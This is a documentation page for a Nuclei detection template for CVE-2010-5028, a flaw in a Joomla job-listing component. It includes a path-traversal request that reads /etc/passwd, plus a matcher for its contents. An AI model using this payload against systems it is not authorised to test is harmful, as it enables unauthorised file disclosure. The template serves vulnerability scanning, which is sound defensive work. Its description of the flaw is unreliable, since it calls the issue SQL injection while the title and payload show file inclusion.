Joomla! Component JE Job 1.0 - Local File Inclusion
ID: CVE-2010-5028
Severity: high
Author: daffainfo
Tags: cve,cve2010,joomla,lfi,edb,harmistechnology,sqli
Description
Section titled “Description”A SQL injection vulnerability in the JExtensions JE Job (com_jejob) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the catid parameter in an item action to index.php.
YAML Source
Section titled “YAML Source”id: CVE-2010-5028
info: name: Joomla! Component JE Job 1.0 - Local File Inclusion author: daffainfo severity: high description: A SQL injection vulnerability in the JExtensions JE Job (com_jejob) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the catid parameter in an item action to index.php. impact: | Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12601 - https://nvd.nist.gov/vuln/detail/CVE-2010-5028 - http://www.vupen.com/english/advisories/2010/1269 - https://exchange.xforce.ibmcloud.com/vulnerabilities/58599 - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-5028 cwe-id: CWE-89 epss-score: 0.00316 epss-percentile: 0.70272 cpe: cpe:2.3:a:harmistechnology:com_jejob:1.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: harmistechnology product: com_jejob tags: cve,cve2010,joomla,lfi,edb,harmistechnology,sqli
http: - method: GET path: - "{{BaseURL}}/index.php?option=com_jejob&view=../../../../../../etc/passwd%00"
matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:"
- type: status status: - 200# digest: 4b0a004830460221008e12fc85d3f7eab886727f89881d5f5615f5f66683f23dfe3ec660a40d99d1ce022100ea1189c967d0765c5c079fadf325ca59e1eb7b968999375847b7066523d0ece7:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2010/CVE-2010-5028.yaml"